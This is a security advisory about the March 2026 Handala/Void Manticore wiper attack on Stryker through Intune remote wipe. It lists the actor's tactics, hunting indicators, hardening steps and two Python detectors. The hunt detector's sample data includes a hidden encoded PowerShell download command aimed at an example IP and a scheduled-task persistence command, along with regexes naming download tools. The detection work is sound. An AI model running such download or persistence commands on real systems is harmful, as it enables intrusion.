7AI SECURITY ADVISORY
Stryker Wiper Attack: What Security Teams Need to Know Now
7AI THREAT RESEARCH TEAM
March 11, 2026
Threat Level: High — Active, Geopolitically Motivated Attack
Threat Actor: Handala (assessed Iranian MOIS / Void Manticore)
Target Sectors: Healthcare, Medical Technology, Global Supply Chain
Attack Type: Destructive Wiper (via Microsoft Intune / MDM Abuse)
TL;DR
On March 11, 2026, the Iran-linked hacktivist group Handala claimed a devastating wiper attack against Stryker Corporation, one of the world's largest medical device manufacturers. The attackers allegedly wiped 200,000+ devices across 79 countries by abusing Microsoft Intune's remote wipe capability. This is not an isolated incident — it is a deliberate geopolitical escalation targeting US companies. If your organization uses Intune or has relationships with Stryker, this document tells you what to look for and what to do right now.
WHAT HAPPENED: THE STRYKER ATTACK
Stryker Corporation — Fortune 500, $25 billion in annual revenue, 56,000 employees, operating in over 60 countries — woke up on March 11, 2026, to find their global IT infrastructure wiped.
The attack began early Wednesday morning. Employees across the United States, Europe, Asia, and other regions suddenly found themselves locked out of laptops, phones, internal systems, and corporate communications. On every affected device running Windows, one thing appeared in place of the Stryker login screen: the logo of Handala, an Iran-linked hacktivist group.
Who Is Handala / Void Manticore?
Handala presents itself as a pro-Palestinian hacktivist group that emerged in late 2023, but the Handala persona is the public face of a much older and more sophisticated actor.
Behind the Handala brand, multiple independent security researchers — including Palo Alto Networks Unit 42, Brandefense, and Microsoft — assess with high confidence that Handala is one of several online personas maintained by Void Manticore, an Iranian state-linked threat actor that has been operating since at least 2022. Void Manticore is tracked across the industry under several names:
- Void Manticore (Palo Alto Unit 42)
- STORM-842 / Storm-0842 (Microsoft)
- Homeland Justice (early campaign name, 2022)
- BANISHED KITTEN (CrowdStrike)
- Karma (alternate persona)
The group is assessed to operate in alignment with Iran's Ministry of Intelligence and Security (MOIS), acting as a strategic extension of Iranian state interests while maintaining plausible deniability through its hacktivist framing. Their operations are explicitly political: public statements, leak packages, and social media narratives are all designed to align with and amplify Iranian state messaging.
Void Manticore's technical toolkit is layered and evolving:
- Phishing and credential harvesting using highly convincing current-event lures, often spoofing legitimate security vendors or government agencies
- Exploitation of unpatched internet-facing services: VPN gateways, web servers, and remote access solutions are common initial access vectors alongside phishing
- Living-off-the-land lateral movement using PowerShell, scheduled tasks, and native OS tools — minimizing the malware footprint and evading detection
- Custom multi-stage wiper malware targeting both Windows and Linux environments, including known families CaddyWiper and ZeroCleare
- Wipers that masquerade as ransomware — they display ransom-style messages, but no decryption mechanism exists. The goal is destruction, not payment
- Coordinated information operations: exfiltrated data is published to Telegram channels and social media as a deliberate post-compromise phase, designed to amplify political and reputational damage beyond the technical disruption
- Website defacement for propaganda effect and psychological pressure
Their campaign history spans multiple geographies and sectors: government ministries in the Balkans (Operation Homeland Justice, 2022), critical infrastructure in Israel (2023), and Western NGOs and think tanks (2024-2025). The Stryker attack is the most significant targeting of a US company to date — a clear escalation following US military involvement in the Iran conflict.
Key Insight: This Is Hybrid Warfare, Not Just a Cyberattack
Void Manticore fuses two objectives that security teams often treat separately: destructive technical impact AND coordinated narrative/reputational damage.
The 50TB Handala claims to have taken from Stryker is not just breach evidence. It is ammunition for an information operation. Expect curated leak packages on Telegram and social platforms, timed to maximize media coverage and erode customer trust — regardless of whether every technical claim is verified.
Why Stryker?
Handala's manifesto cited Stryker's 2019 acquisition of OrthoSpace, an Israeli medical technology company, as the basis for targeting the firm.
The message from Handala is explicit: any company with business ties to Israel — acquisitions, partnerships, shared customers, investment relationships — is a potential target. Stryker was not targeted because of a cybersecurity failure. It was targeted because of its business history.
How the Attack Was Executed
This is where security teams need to pay close attention. Based on reporting from KrebsOnSecurity, investigators believe the attackers did not deploy traditional wiper malware in the initial phase. Instead, they abused a legitimate Microsoft enterprise tool:
Attack Vector: Microsoft Intune Remote Wipe
Attackers obtained administrative credentials for Microsoft Intune — Microsoft's cloud-based mobile device management (MDM) platform. Using Intune's legitimate 'remote wipe' capability, they issued wipe commands against all managed devices in the Stryker tenant.
Result: Every laptop, phone, and Windows device enrolled in the Stryker Intune tenant was factory reset simultaneously. No custom malware required for initial deployment.
Claimed scope: 200,000+ servers, mobile devices, and systems across 79 countries.
This attack vector matters because it means traditional endpoint detection tools may not have flagged the initial phase. The wipe was executed through legitimate administrative channels. This is what makes it particularly difficult to detect and defend against — and why access control to MDM admin accounts is now a critical priority.
Scale of Impact
- Global operations crippled: All 56,000+ employees affected in 79+ countries
- Ireland headquarters hit hardest: 5,000+ Cork facility workers immediately unable to work
- Manufacturing disruption: Engineering, product design, quality control, and supply chain systems offline
- Patient care risk: Hospitals relying on Stryker medical devices face potential supply chain disruption
- Stock impact: Stryker shares fell approximately 4% within hours of the attack becoming public
- Recovery timeline: Unknown — wiper attacks cause permanent data loss with no recovery mechanism for wiped devices
If You Have a Relationship With Stryker
Healthcare organizations and any company that partners with, procures from, or shares data with Stryker should take immediate action across three areas.
1. Your Data at Stryker May Be Exposed
Handala claims to have exfiltrated 50 terabytes of data before executing the wipe. Take that number with appropriate skepticism — threat actors routinely exaggerate — but the category of data is what matters.
Think through what your organization has shared with Stryker over the past several years:
- Procurement data, contracts, and pricing information
- Technical integration data, device configurations, and implant records
- Employee data for joint projects, training, or access provisioning
- Patient outcome data shared for product development, clinical trials, or quality improvement
- Network topology or technical documentation for device integration projects
You may not know definitively what was taken. Assume the worst and investigate accordingly. If you have shared sensitive data with Stryker, consult your legal and privacy teams about notification obligations now.
2. Watch for Stryker-Themed Phishing Immediately
Handala's playbook is well-documented. Phishing is their primary initial access vector. After a high-profile attack like this, follow-on phishing campaigns targeting Stryker's customers and partners are not just possible — they are likely.
Expect lures that exploit the current chaos:
- Emails purporting to be from Stryker security or IT teams about account access, system recovery, or device re-enrollment
- Fake "urgent notices" about affected devices or compromised data, designed to drive clicks before recipients think critically
- Spoofed domains mimicking Stryker communications (stryker-security[.]com, stryker-support[.]net, etc.)
- Vendor impersonation from partners claiming to help Stryker customers during the outage
Immediate Action: Phishing Alert
Alert your employees now: Treat any email related to the Stryker incident with high suspicion.
3. Assess Your Stryker-Connected Devices and Integrations
Hospitals and healthcare systems in particular should immediately inventory their Stryker device footprint:
- Identify all Stryker-manufactured devices connected to your network, including surgical equipment, hospital beds, imaging systems, and implant programming equipment
- Check for any devices that communicate back to Stryker systems — if Stryker's infrastructure is compromised, those connections may need to be suspended pending assessment
- Review network segmentation for your medical device environment: are Stryker devices on isolated segments, or do they have paths to clinical systems or patient data?
- Contact your Stryker account representative through verified channels to understand which product lines are affected and what guidance they are providing
- Do not attempt to reconnect devices to Stryker cloud services until you receive verified guidance from Stryker's security team
What Every Security Team Should Do Now
The Stryker attack is not an isolated incident. It is a preview. As geopolitical tensions between the US, Israel, and Iran remain elevated, other US companies with business connections to Israel — acquisitions, investments, partnerships, customers — should treat this as a direct warning.
Here is what the 7AI security team is advising based on this attack:
Lock Down Microsoft Intune and MDM Admin Access
This is the most urgent action on this list. If Intune admin credentials were the attack vector at Stryker, every organization using Microsoft Intune is running the same risk unless they have implemented privileged access controls.
A compromised Intune admin account can wipe your entire device fleet in minutes. No malware required. No endpoint detection will catch it. You need to make that capability require more than a username and password to activate.
Recommended: Enable Entra PIM for Intune Administrator
Entra Privileged Identity Management (PIM) can be used to make the Intune Administrator role time-limited and approval-required. After this change, no one will hold Intune Admin permanently. Activation will require MFA, justification, and approval from a separate human.
Key settings:
- Require approval to activate: Yes
What an attacker faces: Even with fully compromised admin credentials + MFA bypass, they must request role activation, triggering a notification to a different human who can deny and raise the alarm.
Also required: Apply PIM to the Global Admin role itself, and reduce Global Admin accounts to break-glass only with hardware MFA.
If you cannot implement PIM immediately, these compensating controls reduce your risk:
- Enable Conditional Access policies requiring hardware MFA (FIDO2/phishing-resistant) for all MDM admin accounts
- Restrict Intune admin access to specific managed, compliant devices connecting from Entra Named Locations, not to general workstations on coffee-shop Wi-Fi
- Create an alert for bulk wipe commands (any wipe of more than 3-5 devices in a short window should trigger immediate investigation)
- Regularly audit active Intune Administrator assignments and remove unnecessary permanent assignments
- Review and restrict the scope of service accounts with MDM permissions
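As an added illustration of the bulk-wipe alert recommended in this list (it also covers the "bulk MDM wipe commands issued outside change windows" indicator in the hunting section below), here is a small Python detector. It is example code written for this page, not part of the 7AI advisory or any Microsoft tooling. It runs a per-actor sliding window over Intune audit events. The sample events are constructed; their shape follows the Microsoft Graph deviceManagement/auditEvents resource as this editor understands it (activityDateTime, activityType, actor.userPrincipalName, resources[].displayName), and the 10-minute window, five-device threshold and 22:00-23:59 UTC change window are assumed tuning values for the example.

```python
"""Alert on bulk MDM wipe commands: per-actor sliding window over Intune audit events."""
from collections import deque
from datetime import datetime, time, timedelta, timezone

# Tuning values (assumptions for this example; the advisory only says "more than
# 3-5 devices in a short window").
THRESHOLD = 5                                   # wipes by one actor inside WINDOW
WINDOW = timedelta(minutes=10)                  # the "short window"
CHANGE_WINDOWS = [(time(22, 0), time(23, 59))]  # approved maintenance slots, UTC (assumed)


def _ev(ts, actor, device, activity="wipe ManagedDevice"):
    """Build a constructed audit record in the shape of a Graph auditEvent (assumption)."""
    return {
        "activityDateTime": ts,
        "activityType": activity,
        "actor": {"userPrincipalName": actor},
        "resources": [{"displayName": device}],
    }


# Constructed sample log: six wipes in five minutes at 03:00 UTC from one account,
# two help-desk wipes inside the maintenance slot, and one non-wipe event.
SAMPLE_EVENTS = (
    [_ev(f"2026-03-11T03:0{i}:10Z", "svc-intune-admin@corp.example", f"LAPTOP-{i:04d}")
     for i in range(6)]
    + [
        _ev("2026-03-10T22:10:00Z", "helpdesk@corp.example", "PHONE-0201"),
        _ev("2026-03-10T22:12:00Z", "helpdesk@corp.example", "PHONE-0202"),
        _ev("2026-03-10T09:00:00Z", "helpdesk@corp.example", "LAPTOP-0300",
            activity="syncDevice ManagedDevice"),
    ]
)


def parse_ts(value):
    """Parse the ISO-8601 'Z' timestamps Graph emits into an aware UTC datetime."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def is_wipe(event):
    """Match wipe-type activities regardless of case (e.g. 'wipe ManagedDevice')."""
    return event.get("activityType", "").lower().startswith("wipe")


def in_change_window(ts, windows=CHANGE_WINDOWS):
    """True when the UTC time of day falls inside an approved change window."""
    return any(start <= ts.time() <= end for start, end in windows)


def detect_bulk_wipes(events, threshold=THRESHOLD, window=WINDOW):
    """Return one finding per actor that issued >= threshold wipes within `window`.

    Each actor's deque holds only the wipes inside the sliding window. Once the
    threshold is crossed, later wipes by that actor are appended to the same finding,
    so one alert carries the full device list instead of firing on every event.
    """
    recent = {}    # actor -> deque of (timestamp, device) inside the window
    findings = {}  # actor -> finding dict, created when the threshold is first crossed
    wipes = sorted((e for e in events if is_wipe(e)),
                   key=lambda e: parse_ts(e["activityDateTime"]))
    for ev in wipes:
        ts = parse_ts(ev["activityDateTime"])
        actor = ev["actor"]["userPrincipalName"]
        device = ev["resources"][0]["displayName"]
        dq = recent.setdefault(actor, deque())
        dq.append((ts, device))
        while ts - dq[0][0] > window:
            dq.popleft()
        if actor in findings:
            findings[actor]["devices"].append(device)
        elif len(dq) >= threshold:
            findings[actor] = {
                "actor": actor,
                "first_wipe": dq[0][0].isoformat(),
                "devices": [d for _, d in dq],
                "outside_change_window": not in_change_window(dq[0][0]),
            }
    return list(findings.values())


if __name__ == "__main__":
    for f in detect_bulk_wipes(SAMPLE_EVENTS):
        print(f"ALERT {f['actor']}: {len(f['devices'])} wipes from {f['first_wipe']}"
              f" (outside change window: {f['outside_change_window']})")
```

Run against the sample, only the 03:00 UTC burst is reported: six devices by one account, outside the change window. The two help-desk wipes stay below the threshold; lowering it to two would flag them as well, but with outside_change_window false, which is the signal an analyst would use to close that case quickly. In production the events would come from the Graph audit endpoint or an exported log rather than the inline sample.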
Treat Wiper Attacks as a Distinct Threat Class
Security teams have spent years optimizing for ransomware. Wiper attacks require a different response posture. The key difference: there is no negotiation, no decryption key, and no recovery path for wiped devices.
Your incident response plan almost certainly has a ransomware playbook. Does it have a wiper playbook? If not, build one now. Key elements:
- Offline, air-gapped backups are non-negotiable: Backups connected to your network are vulnerable to the same wipe command
- Recovery time objectives for mass device wipe: How long does it take to re-image 500 laptops? 5,000? Do you have the hardware, imaging infrastructure, and OS licenses staged to do it quickly?
- Device inventory: Do you know every device enrolled in your MDM? An accurate, current inventory is the foundation of any wipe response
- Communication plan for zero IT access: If your email, Slack, and internal systems are all wiped simultaneously, how do you communicate? Have an out-of-band plan
Reassess Your Third-Party Risk Through a Geopolitical Lens
Stryker was targeted not because of a technical vulnerability, but because of a business relationship. That changes the third-party risk calculation.
Traditional third-party risk assessments focus on: Does this vendor have good security controls? The Stryker attack adds a new question: Is this vendor a target for geopolitically motivated adversaries, and if they are breached, what does our exposure look like?
For each high-risk vendor, assess: what data have we shared, what network integrations exist, and what is our exposure if they are wiped?
Review contractor and partner access: Stryker likely has partner accounts and contractor access across its customer base. Those accounts may have been compromised
Patch Your Perimeter — VPNs and Web Servers First
Phishing gets the headlines, but Void Manticore also gains initial access by exploiting unpatched internet-facing services. VPN gateways, web servers, and remote management consoles have all been used as entry points. If your last VPN firmware update was more than a few weeks ago, that is the first thing to check.
- Audit and patch all internet-facing VPN gateways, web servers, and remote access solutions — these are active initial access vectors for this actor
- Review exposure of remote management consoles (RDP, SSH, admin panels) and confirm they are not directly accessible from the internet
- Check for any unusual authentication patterns against VPN or web portals from the past 30 days
- Enforce phishing-resistant MFA (FIDO2/hardware tokens) on all remote access — credential harvesting after phishing is the other primary entry path
Hunt for Void Manticore TTPs in Your Environment
If you have threat hunting capability, run queries for Void Manticore's known indicators now. The group's tactics are well-documented across multiple research sources:
Initial Access Indicators
- Phishing emails using current-event lures (Iran conflict, OrthoSpace, Stryker recovery, geopolitical subject lines)
- Authentication attempts against VPN gateways and web-facing admin consoles from unusual geolocations or at unusual hours
- New scheduled tasks created by non-standard accounts (living-off-the-land persistence method)
- Anomalous PowerShell execution — encoded commands, downloads from external hosts, unusual parent processes
Lateral Movement and Escalation
- AutoIT script execution from unusual directories
- Unexpected RegAsm.exe processes
- NSIS installer packages with no file extensions
- Rapid lateral movement following initial access, especially targeting privileged admin and MDM accounts
Destructive Phase Indicators
- Bulk MDM wipe commands issued outside change windows
- Bulk file overwrite activity (4KB block patterns — CaddyWiper/ZeroCleare signature)
- Wiper payload masquerading as ransomware: ransom note present but no decryption key infrastructure
- Outbound connections to Telegram channels (Void Manticore has used Telegram as exfiltration destination and C2)
- Large-volume outbound data transfers preceding wipe activity — exfiltration precedes destruction
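The initial-access indicators above (anomalous PowerShell with encoded commands and external downloads, scheduled tasks created by non-standard accounts, unusual parent processes) are the kind of thing a hunt query checks per process-creation event. As an added example that is not part of the 7AI advisory, here is a Python hunt over constructed records shaped like Windows 4688 process-creation events; the field names (subject_user, new_process_name, parent_process_name, command_line), the allow-list of accounts permitted to create scheduled tasks, and the sample command lines are all assumptions made for this example, and the 203.0.113.5 address is from the documentation range.

```python
"""Hunt process-creation records for encoded PowerShell, download cradles,
Office-spawned shells and scheduled tasks created by non-standard accounts."""
import base64
import re

# Hypothetical allow-list of accounts expected to create scheduled tasks (assumption).
APPROVED_TASK_CREATORS = {"svc_patch", "svc_sccm"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
DOWNLOAD_PATTERNS = re.compile(
    r"(?i)invoke-webrequest|downloadstring|downloadfile|net\.webclient"
    r"|start-bitstransfer|\biwr\b|\bcurl\b|\bwget\b")
# Matches -e, -ec, -en, -enc and -EncodedCommand followed by a base64 blob;
# it does not match -ExecutionPolicy because no whitespace follows the "-e".
ENCODED_FLAG = re.compile(r"(?i)\s-e(?:n(?:c(?:odedcommand)?)?|c)?\s+([A-Za-z0-9+/=]{16,})")


def _enc(script):
    """PowerShell's -EncodedCommand is base64 over UTF-16LE; used only to build the sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def _rec(user, image, parent, cmd):
    """Constructed record in the shape of a Windows 4688 process-creation event (assumption)."""
    return {"subject_user": user, "new_process_name": image,
            "parent_process_name": parent, "command_line": cmd}


# Constructed sample events: one benign patch script, one Office-spawned encoded
# download, one scheduled task from a contractor account, one from an approved account.
SAMPLE_EVENTS = [
    _rec("svc_patch", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         r"C:\Windows\System32\services.exe",
         r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"),
    _rec("j.doe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
         "powershell.exe -nop -w hidden -enc "
         + _enc(r"Invoke-WebRequest -Uri http://203.0.113.5/stage -OutFile C:\Users\Public\s.dat")),
    _rec("tmp_contractor", r"C:\Windows\System32\schtasks.exe", r"C:\Windows\System32\cmd.exe",
         r'schtasks.exe /create /tn "Updater" /tr C:\Users\Public\u.exe /sc minute /mo 5'),
    _rec("svc_patch", r"C:\Windows\System32\schtasks.exe", r"C:\Windows\System32\cmd.exe",
         r'schtasks.exe /create /tn "PatchScan" /tr C:\scripts\scan.ps1 /sc daily'),
]


def _basename(path):
    """Image name without directory, lower-cased, so comparisons ignore install paths."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand payload, '<undecodable>' on bad base64, or None."""
    m = ENCODED_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable>"


def hunt(events):
    """Apply the hunt rules to each record; return a list of {event, rule, detail} findings."""
    findings = []
    for i, ev in enumerate(events):
        image = _basename(ev["new_process_name"])
        parent = _basename(ev["parent_process_name"])
        user = ev["subject_user"].lower()
        cmd = ev["command_line"]

        def flag(rule, detail):
            findings.append({"event": i, "rule": rule, "detail": detail})

        if image in ("powershell.exe", "pwsh.exe"):
            decoded = decode_encoded_command(cmd)
            effective = cmd if decoded is None else decoded  # match on what actually runs
            if decoded is not None:
                flag("encoded_powershell", decoded)
            if DOWNLOAD_PATTERNS.search(effective):
                flag("powershell_download", effective[:120])
            if parent in OFFICE_PARENTS:
                flag("office_spawned_powershell", parent)
            if re.search(r"(?i)register-scheduledtask", effective) and user not in APPROVED_TASK_CREATORS:
                flag("scheduled_task_by_nonstandard_account", user)
        if image == "schtasks.exe" and re.search(r"(?i)/create", cmd) and user not in APPROVED_TASK_CREATORS:
            flag("scheduled_task_by_nonstandard_account", user)
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"event {f['event']}: {f['rule']} -> {f['detail']}")
```

The benign patch script produces no finding even though it uses -ExecutionPolicy Bypass, the Outlook-spawned shell trips three rules at once (encoded command, external download, Office parent), and only the contractor's schtasks /create is reported. Decoding the -EncodedCommand blob before matching is the step that matters: the download cmdlet never appears in the raw command line.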
For 7AI Customers
The 7AI team is actively running agentic threat hunts across healthcare and healthcare-adjacent customer environments looking for Void Manticore / Handala IOCs and anomalous Intune activity right now. If you are a 7AI customer and want to discuss your specific environment, contact your AI Security Engineer directly.
Prepare a Dual-Track Response: Technical AND Communications
Void Manticore's model demands a response that goes beyond IT recovery. The group treats data exfiltration as ammunition, not just leverage. After executing the technical attack, they publish curated leak packages to Telegram and social platforms to drive media coverage and erode stakeholder trust. Your communications team needs to be in the room from the first hour of an incident — not brought in after the technical response is underway.
Prepare now, before you need it:
- Maintain current emergency contact lists for leadership, legal, IR partners, and insurance carriers in a location that survives a full wipe
- Draft initial breach notification and customer communication templates and store them offline — your email may be down
- Brief your PR and communications team on what a Void Manticore-style leak operation looks like: expect selective, timed releases of data designed for maximum impact
- Prepare a monitoring plan for your company name on Telegram channels and dark web forums — early detection of leak activity gives you a response window
- Know your cyber insurance notification requirements and deadlines — missing them because your systems are wiped can invalidate coverage
- Run a tabletop exercise that simulates a combined wiper attack and coordinated data leak: your legal, comms, IT, and executive teams should all participate, because in a real Void Manticore attack, all of them will be needed at the same time
The Bigger Picture
This attack marks a new phase. Until now, US companies largely sat outside the direct targeting scope of Iran-linked destructive cyber operations. The Stryker attack appears to be the first known major wiper attack on a US company in the current Iran conflict.
FBI Director Kash Patel posted publicly on the day of the attack that the FBI is working 24/7 to address the threat. The US government is treating this as a serious escalation. You should too.
Handala's statement called this "only the beginning of a new chapter in the cyber war." Whether that is propaganda or operational intent, the security posture implication is the same: the threat is elevated, it is geopolitically driven, and it is not going away when the news cycle moves on.
The question for every security team right now is not whether they have enough budget or enough tools. It is whether they have enough visibility, fast enough investigation, and the right access controls in place to catch an attack moving at the speed and scale of Stryker before it becomes catastrophic.
Immediate Action Checklist

Action | Applies To
Implement Entra PIM for Intune Administrator role | Microsoft Intune users
Alert employees: treat all Stryker-related emails as suspicious | All organizations
Audit and patch internet-facing VPN gateways, web servers, and remote access consoles | All organizations
Audit Intune/MDM admin accounts; remove unnecessary permanent assignments | All organizations
Enable alerting on bulk MDM wipe commands | All organizations
Verify offline backup integrity and test restoration procedures | All organizations
Begin hunting for Handala IOCs in your environment | All organizations
Assess what data your org has shared with Stryker | Stryker customers/partners
Inventory and review all Stryker-connected devices on your network | Healthcare / Stryker customers
Review third-party vendor list for elevated geopolitical risk | All organizations
Update IR playbooks to include wiper attack scenarios | All organizations
Establish out-of-band emergency communications capability | All organizations
Confirm phishing-resistant MFA on all admin and privileged accounts | All organizations
Set up Telegram/dark web monitoring for your company name (leak early warning) | All organizations
Run tabletop exercise: combined wiper attack + coordinated data leak scenario | All organizations

Note: Timing column (Today / 24-48 hrs / This week) is indicated by row background color in the original layout — red for immediate, amber for near-term, green for this week.